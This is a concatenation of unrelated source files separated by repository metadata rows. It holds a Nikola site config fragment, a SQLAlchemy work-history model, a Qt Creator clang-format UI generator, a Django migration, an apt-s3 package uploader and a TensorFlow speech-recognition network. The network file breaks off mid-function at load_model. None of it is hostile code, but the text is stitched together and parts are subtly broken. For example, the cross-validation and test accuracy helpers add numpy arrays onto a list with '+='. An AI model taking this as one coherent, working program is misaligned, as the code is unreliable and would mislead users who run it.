# A search form to search this site, for the sidebar. You can use a google
# custom search (http://www.google.com/cse/)
# Or a duckduckgo search: https://duckduckgo.com/search_box.html
# Default is no search form.
# SEARCH_FORM = ""
#
# This search form works for any site and looks good in the "site" theme where
# it appears on the navigation bar:
#
SEARCH_FORM = """
<!-- Custom search -->
<form method="get" id="search" action="http://duckduckgo.com/"
class="navbar-form pull-left">
<input type="hidden" name="sites" value="%s"/>
<input type="hidden" name="k8" value="#444444"/>
<input type="hidden" name="k9" value="#D51920"/>
<input type="hidden" name="kt" value="h"/>
<input type="text" name="q" maxlength="255" placeholder="DuckDuckGo…" class="span2 form-control input-sm" style="width:65%%; padding:0; height:2em;"/>
<input type="submit" value="DuckDuckGo Search" style="visibility: hidden; width: 5%%" />
</form>
<!-- End of custom search -->
""" % SITE_URL
#
# If you prefer a google search form, here's an example that should just work:
#SEARCH_FORM = """
#<!-- Custom search with google-->
#<form id="search" action="http://google.com/search" method="get" class="navbar-form pull-left">
#<input type="hidden" name="q" value="site:%s" />
#<input type="text" name="q" maxlength="255" results="0" placeholder="Search"/>
#</form>
#<!-- End of custom search -->
#""" % SITE_URL
# Also, there is a local search plugin you can use, based on Tipue, but it requires setting several
# options:
# SEARCH_FORM = """
# <span class="navbar-form pull-left">
# <input type="text" id="tipue_search_input">
# </span>"""
#
# BODY_END = """
# <script type="text/javascript" src="/assets/js/tipuesearch_set.js"></script>
# <script type="text/javascript" src="/assets/js/tipuesearch.js"></script>
# <script type="text/javascript">
# $(document).ready(function() {
# $('#tipue_search_input').tipuesearch({
# 'mode': 'json',
# 'contentLocation': '/assets/js/tipuesearch_content.json',
# 'showUrl': false
# });
# });
# </script>
# """
EXTRA_HEAD_DATA = """
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-44317802-1']);
_gaq.push(['_setDomainName', 'virtua-peanuts.net']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>"""
# <link rel="stylesheet" type="text/css" href="/assets/css/tipuesearch.css">
# <div id="tipue_search_content" style="margin-left: auto; margin-right: auto; padding: 20px;"></div>
# ENABLED_EXTRAS = ['local_search']
#
# Use content distribution networks for jquery and twitter-bootstrap css and js
# If this is True, jquery is served from the Google CDN and twitter-bootstrap
# is served from the NetDNA CDN
# Set this to False if you want to host your site without requiring access to
# external resources.
# USE_CDN = False
# Extra things you want in the pages HEAD tag. This will be added right
# before </HEAD>
# EXTRA_HEAD_DATA = ""
# Google analytics or whatever else you use. Added to the bottom of <body>
# in the default template (base.tmpl).
# BODY_END = ""
# The possibility to extract metadata from the filename by using a
# regular expression.
# To make it work you need to name parts of your regular expression.
# The following names will be used to extract metadata:
# - title
# - slug
# - date
# - tags
# - link
# - description
#
# An example re is the following:
# '(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)-(?P<title>.*)\.md'
# FILE_METADATA_REGEXP = None
# Additional metadata that is added to a post when creating a new_post
ADDITIONAL_METADATA = {}
# Nikola supports Twitter Card summaries / Open Graph.
# Twitter cards make it possible for you to attach media to Tweets
# that link to your content.
#
# IMPORTANT:
# Please note, that you need to opt-in for using Twitter Cards!
# To do this please visit
# https://dev.twitter.com/form/participate-twitter-cards
#
# Uncomment and modify to following lines to match your accounts.
# Specifying the id for either 'site' or 'creator' will be preferred
# over the cleartext username. Specifying an ID is not necessary.
# Displaying images is currently not supported.
# TWITTER_CARD = {
# # 'use_twitter_cards': True, # enable Twitter Cards / Open Graph
# # 'site': '@website', # twitter nick for the website
# # 'site:id': 123456, # Same as site, but the website's Twitter user ID
# # instead.
# # 'creator': '@username', # Username for the content creator / author.
# # 'creator:id': 654321, # Same as creator, but the Twitter user's ID.
# }
# If you want to use formatted post time in W3C-DTF Format
# (ex. 2012-03-30T23:00:00+02:00),
# set timzone if you want a localized posted date.
#
TIMEZONE = 'Europe/Paris'
# If webassets is installed, bundle JS and CSS to make site loading faster
# USE_BUNDLES = True
# Plugins you don't want to use. Be careful :-)
# DISABLED_PLUGINS = ["render_galleries"]
# Experimental plugins - use at your own risk.
# They probably need some manual adjustments - please see their respective
# readme.
ENABLED_EXTRAS = [
# 'planetoid',
# 'ipynb',
# 'local_search',
# 'render_mustache',
]
# List of regular expressions, links matching them will always be considered
# valid by "nikola check -l"
# LINK_CHECK_WHITELIST = []
# If set to True, enable optional hyphenation in your posts (requires pyphen)
# HYPHENATE = False
# Put in global_context things you want available on all your templates.
# It can be anything, data, functions, modules, etc.
GLOBAL_CONTEXT = {}
| gpl-3.0 | -2,642,146,339,466,596,400 | 34.269051 | 225 | 0.670915 | false |
xuanthuong/golfgame | models/work_history.py | 1 | 2217 | # -*- coding: utf-8 -*-
# Description: work_history table
# By Thuong.Tran
# Date: 29 Aug 2017
from sqlalchemy import create_engine, Table, Column, MetaData, Integer, Text, DateTime, Float
from sqlalchemy import select, and_
import datetime as dt
class work_history():
def __init__(self, db_url):
_engine = create_engine(db_url)
_connection = _engine.connect()
_metadata = MetaData()
_work_history = Table("work_history", _metadata,
Column("WRK_HIS_ID", Integer, primary_key=True),
Column("USR_ID", Integer),
Column("PROC_NM", Text),
Column("ST_DT", DateTime),
Column("END_DT", DateTime),
Column("LD_TM", Float),
Column("CRE_DT", DateTime))
_metadata.create_all(_engine)
self.connection = _connection
self.work_history = _work_history
pass
def insert_to(self, data):
is_valid = True
# for item in data:
# if not item:
# is_valid = False
# raise DropItem("Missing %s!" % item)
if is_valid:
ins_query = self.work_history.insert().values(data)
self.connection.execute(ins_query)
def get_all(self):
s = select([self.work_history]).order_by('PROC_NM')
result = self.connection.execute(s)
return result
def get_by_period(self, start_date, end_date):
s = select([self.work_history]).where(and_(self.work_history.c.ST_DT >= start_date,
self.work_history.c.END_DT <= end_date))
result = self.connection.execute(s)
return result
def get_finalized_process_of_one_day(self, today, worker):
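    # Bound the query to the calendar day containing `today` (00:00:00 through 23:59:59).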
lower = dt.datetime(today.year, today.month, today.day, 0, 0, 0)
upper = dt.datetime(today.year, today.month, today.day, 23, 59, 59)
print(lower)
print(upper)
s = select([self.work_history]).where(and_(self.work_history.c.END_DT > lower,
self.work_history.c.END_DT < upper,
self.work_history.c.USR_ID == worker))
result = self.connection.execute(s)
return result
| mit | 6,242,151,486,691,357,000 | 35.95 | 93 | 0.564727 | false |
qtproject/qt-creator | scripts/generateClangFormatChecksUI.py | 3 | 9025 | #!/usr/bin/env python
############################################################################
#
# Copyright (C) 2019 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import argparse
import json
import os
import docutils.nodes
import docutils.parsers.rst
import docutils.utils
def full_ui_content(checks):
return '''<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
<class>ClangFormat::ClangFormatChecksWidget</class>
<widget class="QWidget" name="ClangFormat::ClangFormatChecksWidget">
<property name="maximumSize">
<size>
<width>480</width>
<height>16777215</height>
</size>
</property>
<layout class="QGridLayout" name="checksLayout">
''' + checks + ''' </layout>
</widget>
<resources/>
<connections/>
</ui>
'''
def parse_arguments():
parser = argparse.ArgumentParser(description='Clazy checks header file generator')
parser.add_argument('--clang-format-options-rst', help='path to ClangFormatStyleOptions.rst',
default=None, dest='options_rst')
return parser.parse_args()
def parse_rst(text):
parser = docutils.parsers.rst.Parser()
components = (docutils.parsers.rst.Parser,)
settings = docutils.frontend.OptionParser(components=components).get_default_values()
document = docutils.utils.new_document('<rst-doc>', settings=settings)
parser.parse(text, document)
return document
def createItem(key, value, index):
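    # Build the Qt Designer XML for one option row (label plus editor widget) and return it with the updated row index.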
label = ''' <item row="''' + str(index) + '''" column="0">
<widget class="QLabel" name="label''' + key + '''">
<property name="text">
<string notr="true">''' + key + '''</string>
</property>
</widget>
</item>
'''
value_item = ''
if value[0] == 'bool':
value_item = ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + key + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
<item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">true</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">false</string>
</property>
</item>
</widget>
</item>
'''
elif value[0].startswith('std::string') or value[0] == 'unsigned' or value[0] == 'int':
value_item = ''' <item row="''' + str(index) + '''" column="1">
<layout class="QHBoxLayout">
<item>
<widget class="QLineEdit" name="''' + key + '''">
</widget>
</item>
<item>
<widget class="QPushButton" name="set''' + key + '''">
<property name="maximumSize">
<size>
<width>40</width>
<height>16777215</height>
</size>
</property>
<property name="text">
<string notr="true">Set</string>
</property>
</widget>
</item>
</layout>
</item>
'''
elif value[0].startswith('std::vector'):
value_item = ''' <item row="''' + str(index) + '''" column="1">
<layout class="QHBoxLayout">
<item>
<widget class="QPlainTextEdit" name="''' + key + '''">
<property name="sizePolicy">
<sizepolicy hsizetype="Expanding" vsizetype="Fixed"/>
</property>
<property name="maximumSize">
<size>
<width>16777215</width>
<height>50</height>
</size>
</property>
</widget>
</item>
<item>
<widget class="QPushButton" name="set''' + key + '''">
<property name="maximumSize">
<size>
<width>40</width>
<height>16777215</height>
</size>
</property>
<property name="text">
<string notr="true">Set</string>
</property>
</widget>
</item>
</layout>
</item>
'''
else:
if ' ' in value[1]:
value_item = ''
for i, val in enumerate(value):
if i == 0:
continue
index += 1
space_index = val.find(' ')
val = val[space_index + 1:]
value_item += ''' <item row="''' + str(index) + '''" column="0">
<widget class="QLabel" name="label''' + val + '''">
<property name="text">
<string notr="true"> ''' + val + '''</string>
</property>
</widget>
</item>
'''
value_item += ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + val + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
<item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">true</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">false</string>
</property>
</item>
</widget>
</item>
'''
else:
value_item = ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + key + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
'''
if key == 'Language':
value_item += ''' <property name="enabled">
<bool>false</bool>
</property>
'''
if index > 0:
value_item += ''' <item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
'''
for i, val in enumerate(value):
if i == 0:
continue
underline_index = val.find('_')
val = val[underline_index + 1:]
value_item += ''' <item>
<property name="text">
<string notr="true">''' + val + '''</string>
</property>
</item>
'''
value_item += ''' </widget>
</item>
'''
return label + value_item, index
class MyVisitor(docutils.nodes.NodeVisitor):
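    # Walks the parsed RST and records, for each style option (definition-list term),
    # its type followed by any enumerated values found in the option's bullet list.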
in_bullet_list = False
in_bullet_list_paragraph = False
tree = {}
last_key = ''
def visit_term(self, node):
node_values = node.traverse(condition=docutils.nodes.Text)
name = node_values[0].astext()
self.last_key = name
self.tree[name] = [node_values[2].astext()]
def visit_bullet_list(self, node):
self.in_bullet_list = True
def depart_bullet_list(self, node):
self.in_bullet_list = False
def visit_paragraph(self, node):
if self.in_bullet_list:
self.in_bullet_list_paragraph = True
def depart_paragraph(self, node):
self.in_bullet_list_paragraph = False
def visit_literal(self, node):
if self.in_bullet_list_paragraph:
value = node.traverse(condition=docutils.nodes.Text)[0].astext()
self.tree[self.last_key].append(value)
self.in_bullet_list_paragraph = False
def unknown_visit(self, node):
"""Called for all other node types."""
#print(node)
pass
def unknown_departure(self, node):
pass
def main():
arguments = parse_arguments()
content = file(arguments.options_rst).read()
document = parse_rst(content)
visitor = MyVisitor(document)
document.walkabout(visitor)
keys = visitor.tree.keys()
basedOnStyleKey = 'BasedOnStyle'
keys.remove(basedOnStyleKey)
keys.sort()
text = ''
line, index = createItem(basedOnStyleKey, visitor.tree[basedOnStyleKey], 0)
text += line
index = 1
for key in keys:
line, index = createItem(key, visitor.tree[key], index)
text += line
index += 1
current_path = os.path.dirname(os.path.abspath(__file__))
ui_path = os.path.abspath(os.path.join(current_path, '..', 'src',
'plugins', 'clangformat', 'clangformatchecks.ui'))
with open(ui_path, 'w') as f:
f.write(full_ui_content(text))
if __name__ == "__main__":
main()
| gpl-3.0 | -6,718,310,938,669,209,000 | 30.013746 | 97 | 0.560665 | false |
Ircam-Web/mezzanine-organization | organization/agenda/migrations/0033_dynamicmultimediaevent.py | 1 | 1459 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-11-30 10:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import mezzanine.core.fields
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('mezzanine_agenda', '0028_auto_20180926_1235'),
('organization-agenda', '0032_auto_20181108_1636'),
]
operations = [
migrations.CreateModel(
name='DynamicMultimediaEvent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('_order', mezzanine.core.fields.OrderField(null=True, verbose_name='Order')),
('object_id', models.PositiveIntegerField(editable=False, null=True, verbose_name='related object')),
('content_type', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='content type')),
('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dynamic_multimedia', to='mezzanine_agenda.Event', verbose_name='event')),
],
options={
'verbose_name': 'Multimedia',
'ordering': ('_order',),
},
),
]
| agpl-3.0 | 7,624,932,403,393,662,000 | 43.212121 | 199 | 0.626456 | false |
JamieCressey/apt-s3 | apts3/__init__.py | 1 | 6562 | # Copyright 2016 Jamie Cressey
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import boto3
import botocore.exceptions
import logging
import sys
import json
import pwd
import os
import apt.resources
from datetime import datetime, timedelta
from time import sleep
__author__ = 'Jamie Cressey'
__version__ = '0.9.0'
class AptS3(object):
def __init__(self, args):
self.log = self._logger()
self.args = args
self.debs = args.files.split()
if args.action == 'upload':
self.upload_debs()
elif args.action == 'delete':
self.delete_debs()
else:
self.log.error('Unknown command: {}'.format(args.action))
def _logger(self):
log = logging.getLogger('apt-s3')
log.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter(
'%(asctime)s %(levelname)-8s %(name)s: %(message)s',
'%Y-%m-%d %H:%M:%S'))
log.addHandler(handler)
return log
def _s3_conn(self):
boto3.setup_default_session(
profile_name=self.args.profile,
region_name=self.args.region)
self.s3 = boto3.client('s3')
def _check_debs_exist(self, deb):
if not os.path.isfile(deb):
self.log.error('File {0} doesn\'t exist'.format(deb))
exit(1)
def _check_lock(self, arch):
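    # Cooperative repository lock: wait for any existing S3 lockfile to clear (erroring out if it looks stale), then write our own.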
if self.args.lock:
lockfile = 'dists/{0}/{1}/binary-{2}/apts3_lockfile'.format(
self.args.codename, self.args.component, arch)
ts_now = datetime.utcnow()
ts_stop = ts_now + timedelta(seconds=self.args.lock_timeout)
while ts_now < ts_stop:
try:
lock = self.s3.get_object(
Bucket=self.args.bucket,
Key=lockfile)
lock_body = json.loads(lock['Body'].read())
self.log.info(
"Repository is locked by another user: {0}@{1}".format(
lock_body['user'], lock_body['host']))
ts_now = datetime.utcnow()
ts_lock = lock['LastModified'].replace(tzinfo=None)
ts_diff = ts_now - ts_lock
if ts_diff.seconds > self.args.lock_timeout:
self.log.error(
'Repository lock is too old: {}. Please investigate.'.format(ts_diff))
exit(1)
sleep(10)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == 'NoSuchKey':
break
else:
raise
self.log.info("Attempting to obtain a lock")
lock_body = json.dumps({
"user": pwd.getpwuid(os.getuid()).pw_name,
"host": os.uname()[1]
})
self.s3.put_object(
Body=lock_body,
Bucket=self.args.bucket,
Key=lockfile)
self.log.info("Locked repository for updates")
def _delete_lock(self, arch):
if self.args.lock:
self.log.info('Removing lockfile')
lockfile = 'dists/{0}/{1}/binary-{2}/apts3_lockfile'.format(
self.args.codename, self.args.component, arch)
self.s3.delete_object(
Bucket=self.args.bucket,
Key=lockfile)
def _parse_manifest(self, arch):
self.manifests[arch] = apt.resources.Manifest(
bucket=self.args.bucket,
codename=self.args.codename,
component=self.args.component,
architecture=arch,
visibility=self.args.visibility,
s3=self.s3)
def _parse_package(self, deb):
self.log.info("Examining package file {}".format(deb))
pkg = apt.resources.Package(deb)
if self.args.arch:
arch = self.args.arch
elif pkg.architecture:
arch = pkg.architecture
else:
self.log.error(
"No architcture given and unable to determine one for {0}. Please specify one with --arch [i386|amd64].".format(deb))
exit(1)
if arch == 'all' and len(self.manifests) == 0:
self.log.error(
                'Package {0} had architecture "all", however no existing package lists exist. This can often happen if the first package you are adding to a new repository is an "all" architecture file. Please use --arch [i386|amd64] or another platform type to upload the file.'.format(deb))
exit(1)
if arch not in self.manifests:
self._parse_manifest(arch)
self.manifests[arch].add(pkg)
if arch == 'all':
self.packages_arch_all.append(pkg)
def _update_manifests(self):
for arch, manifest in self.manifests.iteritems():
if arch == 'all':
continue
for pkg in self.packages_arch_all:
manifest.add(pkg)
def _upload_manifests(self):
self.log.info('Uploading packages and new manifests to S3')
for arch, manifest in self.manifests.iteritems():
self._check_lock(arch)
manifest.write_to_s3()
self.release.update_manifest(manifest)
self.log.info('Update complete.')
self._delete_lock(arch)
def upload_debs(self):
if not self.debs:
self.log.error('You must specify at least one file to upload')
exit(1)
map(self._check_debs_exist, self.debs)
self._s3_conn()
self.log.info("Retrieving existing manifests")
self.release = apt.resources.Release(self.args)
self.manifests = {}
map(self._parse_manifest, self.release['architectures'])
self.packages_arch_all = []
map(self._parse_package, self.debs)
| apache-2.0 | -2,980,966,164,605,318,700 | 32.141414 | 287 | 0.556995 | false |
GEMISIS/machine-learning | Kaggle/TensorFlow Speech Recognition Challenge/neural_network.py | 1 | 15527 | import os
import tensorflow as tf
import numpy as np
from data import get_files
from data import FEATURES
from data import OUTPUTS
from data import RESULT_MAP
class DataPoint:
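    # Container for a single dataset split; these class-level defaults are overwritten per instance by NNData.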
length = 0
filenames = []
xs = []
ys = []
# Our expected inputs for training, testing, etc.
class NNData:
training = DataPoint()
cross_validation = DataPoint()
testing = DataPoint()
everything = DataPoint()
output = DataPoint()
def __init__(self, load_training_data=True, partial=False, split_type="test", cv_percent=0.2, test_percent=0.2):
# Start by reading in our CSV files.
self.everything.xs, self.everything.ys, self.everything.filenames = get_files(partial, training_data=load_training_data)
self.everything.length = len(self.everything.xs)
if split_type == "cv-test":
# Get our training data.
self.training.xs = self.everything.xs[0:int(self.everything.length * (1 - cv_percent - test_percent))]
self.training.ys = self.everything.ys[0:int(self.everything.length * (1 - cv_percent - test_percent))]
self.training.filenames = self.everything.filenames[0:int(self.everything.length * (1 - cv_percent - test_percent))]
self.training.length = int(self.everything.length * (1 - cv_percent - test_percent))
# Get our cross validation data.
self.cross_validation.xs = self.everything.xs[int(self.everything.length * (1 - cv_percent - test_percent)):int(self.everything.length * (1 - test_percent))]
self.cross_validation.ys = self.everything.ys[int(self.everything.length * (1 - cv_percent - test_percent)):int(self.everything.length * (1 - test_percent))]
self.cross_validation.filenames = self.everything.filenames[int(self.everything.length * (1 - cv_percent - test_percent)):int(self.everything.length * (1 - test_percent))]
self.cross_validation.length = int(self.everything.length * (1 - test_percent)) - int(self.everything.length * (1 - cv_percent - test_percent))
# Get our testing data.
self.testing.xs = self.everything.xs[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.ys = self.everything.ys[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.filenames = self.everything.filenames[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.length = self.everything.length - int(self.everything.length * (1 - test_percent))
elif split_type == "test":
# Get our training data.
self.training.xs = self.everything.xs[0:int(self.everything.length * (1 - test_percent))]
self.training.ys = self.everything.ys[0:int(self.everything.length * (1 - test_percent))]
self.training.filenames = self.everything.filenames[0:int(self.everything.length * (1 - test_percent))]
self.training.length = int(self.everything.length * (1 - test_percent))
# Get our testing data.
self.testing.xs = self.everything.xs[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.ys = self.everything.ys[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.filenames = self.everything.filenames[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.length = self.everything.length - int(self.everything.length * (1 - test_percent))
else:
# Get our training data.
self.training.xs = self.everything.xs[0:self.everything.length]
self.training.ys = self.everything.ys[0:self.everything.length]
self.training.filenames = self.everything.filenames[0:self.everything.length]
self.training.length = self.everything.length
# Setup our weights and biases and try to prevent them from
# ever getting to 0 (dying) as best we can.
def weight_variable(shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name="W" + name)
def bias_variable(shape, name):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name="b" + name)
# Setup our convolution (with strides of 1).
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
# Setup our pooling options (2x2 matrix for pooling)
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
# Creates a convolutional pooling network.
def create_conv_pool(input, input_size, output_size, name="conv"):
with tf.name_scope(name):
        weights = weight_variable([5, 5, input_size, output_size], name)
        biases = bias_variable([output_size], name)
activation = tf.nn.relu(conv2d(input, weights) + biases)
tf.summary.histogram("weights", weights)
tf.summary.histogram("biases", biases)
tf.summary.histogram("activations", activation)
return max_pool_2x2(activation)
# Creates our fully connected layer.
def create_fc_layer(input, input_size, output_size, name="fc"):
with tf.name_scope(name):
        weights = weight_variable([input_size, output_size], name)
        biases = bias_variable([output_size], name)
flat_input = tf.reshape(input, [-1, input_size])
return tf.nn.relu(tf.matmul(flat_input, weights) + biases)
# Creates our dropout layer which is used for our prediction.
def create_dropout_connected_readout(input, input_size, output_size, name="readout"):
with tf.name_scope(name):
        weights = weight_variable([input_size, output_size], name)
        biases = bias_variable([output_size], name)
weight_dropout = tf.nn.dropout(weights, keep_prob) * keep_prob
return tf.matmul(input, weight_dropout) + biases
def create_layer(name, input, input_shape, output_shape, activation_function=None):
# Create our weights and calculate our prediction.
W = weight_variable([input_shape, output_shape], name)
b = bias_variable([output_shape], name)
y = tf.matmul(input, W) + b
if activation_function is "softmax":
y = tf.nn.softmax(y)
if activation_function is "relu":
y = tf.nn.relu(y)
# Give some summaries for the outputs.
tf.summary.histogram("weights_" + name, W)
tf.summary.histogram("biases_" + name, b)
tf.summary.histogram("y_" + name, y)
return W, y
with tf.name_scope("prediction"):
x = tf.placeholder(tf.float32, [None, FEATURES], name="inputs")
keep_prob = tf.placeholder(tf.float32, name="kP")
y_ = tf.placeholder(tf.float32, [None, OUTPUTS], name="actuals")
W_input, y_input = create_layer("input", x, FEATURES, 100, activation_function="softmax")
W_hidden, y_hidden = create_layer("hidden", y_input, 100, 100, activation_function=None)
W_activation, y_activation = create_layer("activation", y_hidden, 100, OUTPUTS, activation_function=None)
prediction = tf.nn.softmax(y_activation)
        # Get the predicted class (index of the highest-probability output).
output = tf.argmax(prediction, 1)
# Now calculate the error and train it.
with tf.name_scope("cost"):
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_activation))
tf.summary.scalar("cost", cost)
with tf.name_scope("train"):
train_step = tf.train.AdamOptimizer(1e-4).minimize(cost)
# Calculate the list of correct predictions.
correct_prediction = tf.cast(tf.equal(tf.argmax(prediction, 1), tf.argmax(y_, 1)), tf.float32)
    # We want to calculate the accuracy from an input so that we can batch everything.
prediction_results = tf.placeholder_with_default(correct_prediction, [None], name="prediction_results")
accuracy = tf.reduce_mean(prediction_results)
tf.summary.scalar("accuracy", accuracy)
    # Calculate our F1 score. Need to learn how to do this for multiclass.
# tp = tf.count_nonzero(tf.argmax(prediction, 1) * tf.argmax(y_, 1))
# tn = tf.count_nonzero((tf.argmax(prediction, 1) - 1) * (tf.argmax(y_, 1) - 1))
# fp = tf.count_nonzero(tf.argmax(prediction, 1) * (tf.argmax(y_, 1) - 1))
# fn = tf.count_nonzero((tf.argmax(prediction, 1) - 1) * tf.argmax(y_, 1))
# precision = tp / (tp + fp)
# recall = tp / (tp + fn)
# f1 = 2 * precision * recall / (precision + recall)
# tf.summary.scalar("f1", f1)
saver = tf.train.Saver(tf.global_variables())
#############################################################
#############################################################
#############################################################
# Helper methods for utilizing the neural network. #########
#############################################################
#############################################################
#############################################################
def setup(log_dir):
# Setup our session.
sess = tf.InteractiveSession()
merged_summary = tf.summary.merge_all()
writer = tf.summary.FileWriter(log_dir)
writer.add_graph(sess.graph)
tf.global_variables_initializer().run()
return sess, merged_summary, writer
# Keep track of our training iterations.
training_iteration = 0
def train(sess, data, batch=1):
global training_iteration
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.training.length)
data_end = int((i / batch) * data.training.length)
sess.run(train_step, feed_dict={x: data.training.xs[data_start:data_end], keep_prob: 0.5, y_: data.training.ys[data_start:data_end]})
training_iteration += 1
if batch > 1:
                progress = int((i / batch) * 10)
print('\rBatched Training: [{0}{1}] {2}%'.format('#' * progress, ' ' * (10 - progress), round(10 * progress, 2)), end=" ")
if batch > 1:
print()
def train_summary(sess, data, merged_summary, writer, batch=1):
global training_iteration
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.training.length)
data_end = int((i / batch) * data.training.length)
s, t = sess.run([merged_summary, train_step], feed_dict={x: data.training.xs[data_start:data_end], keep_prob: 0.5, y_: data.training.ys[data_start:data_end]})
writer.add_summary(s, training_iteration)
training_iteration += 1
if batch > 1:
progress = int((i / batch) * 10)
print('\rBatched Training: [{0}{1}] {2}%'.format('#' * progress, ' ' * (10 - progress), round(10 * progress, 2)), end=" ")
if batch > 1:
print()
# Accuracy methods.
def get_train_accuracy(sess, data, batch=1):
total_predictions = []
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.training.length)
data_end = int((i / batch) * data.training.length)
predictions = sess.run(correct_prediction, feed_dict={x: data.training.xs[data_start:data_end], keep_prob: 1.0, y_: data.training.ys[data_start:data_end]})
total_predictions = np.concatenate((total_predictions, predictions), axis=0)
return sess.run(accuracy, feed_dict={prediction_results: total_predictions}) * 100
def get_cv_accuracy(sess, data, batch=1):
total_predictions = []
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.cross_validation.length)
data_end = int((i / batch) * data.cross_validation.length)
predictions = sess.run(correct_prediction, feed_dict={x: data.cross_validation.xs[data_start:data_end], keep_prob: 1.0, y_: data.cross_validation.ys[data_start:data_end]})
total_predictions += predictions
return sess.run(accuracy, feed_dict={prediction_results: total_predictions}) * 100
def get_test_accuracy(sess, data, batch=1):
total_predictions = []
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.testing.length)
data_end = int((i / batch) * data.testing.length)
predictions = sess.run(correct_prediction, feed_dict={x: data.testing.xs[data_start:data_end], keep_prob: 1.0, y_: data.testing.ys[data_start:data_end]})
total_predictions += predictions
return sess.run(accuracy, feed_dict={prediction_results: total_predictions}) * 100
def get_total_accuracy(sess, data, batch=1):
total_predictions = []
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.everything.length)
data_end = int((i / batch) * data.everything.length)
predictions = sess.run(correct_prediction, feed_dict={x: data.everything.xs[data_start:data_end], keep_prob: 1.0, y_: data.everything.ys[data_start:data_end]})
total_predictions += predictions
return sess.run(accuracy, feed_dict={prediction_results: total_predictions}) * 100
# Cost methods.
def get_train_cost(sess, data):
return sess.run(cost, feed_dict={x: data.training.xs, keep_prob: 1.0, y_: data.training.ys})
def get_cv_cost(sess, data):
return sess.run(cost, feed_dict={x: data.cross_validation.xs, keep_prob: 1.0, y_: data.cross_validation.ys})
def get_test_cost(sess, data):
return sess.run(cost, feed_dict={x: data.testing.xs, keep_prob: 1.0, y_: data.testing.ys})
def get_total_cost(sess, data):
return sess.run(cost, feed_dict={x: data.everything.xs, keep_prob: 1.0, y_: data.everything.ys})
# F1 Score methods.
# def get_train_f1_score(sess, data):
# return sess.run(f1, feed_dict={x: data.training.xs, keep_prob: 1.0, y_: data.training.ys})
# def get_cv_f1_score(sess, data):
# return sess.run(f1, feed_dict={x: data.cross_validation.xs, keep_prob: 1.0, y_: data.cross_validation.ys})
# def get_test_f1_score(sess, data):
# return sess.run(f1, feed_dict={x: data.testing.xs, keep_prob: 1.0, y_: data.testing.ys})
# def get_total_f1_score(sess, data):
# return sess.run(f1, feed_dict={x: data.everything.xs, keep_prob: 1.0, y_: data.everything.ys})
def reset():
tf.global_variables_initializer().run()
def load_model(sess, model_name, directory="model"):
